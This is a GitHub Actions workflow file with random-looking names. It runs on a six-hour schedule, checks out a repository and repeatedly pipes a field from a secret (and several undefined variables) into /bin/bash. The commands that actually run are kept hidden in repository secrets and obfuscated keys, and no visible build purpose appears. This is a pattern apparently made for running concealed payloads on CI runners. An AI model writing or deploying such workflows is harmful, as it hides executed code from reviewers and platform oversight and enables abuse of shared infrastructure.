name: zhanxugang9871

on:
  workflow_dispatch:
  schedule:
    - cron: '12 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhanxugang9871
        env:
          jk98: ${{ secrets.jk98 }}
        run: |
          echo $jk98 | jq -r .ykhlj1414 | /bin/bash
          echo $oplju94684 | jq -r .unfvo6 | /bin/bash
          echo $efzo90705 | jq -r .y67 | /bin/bash
          echo $rfl9357 | jq -r .kqmbo6122 | /bin/bash
          echo $g9512 | jq -r .nwvhy76869 | /bin/bash
          echo $msswm4 | jq -r .xsto086 | /bin/bash
          echo $pwqbh25571 | jq -r .pvpg5 | /bin/bash
          echo $hfn3 | jq -r .arvyx42828 | /bin/bash
          echo $cpws7304 | jq -r .r54269 | /bin/bash

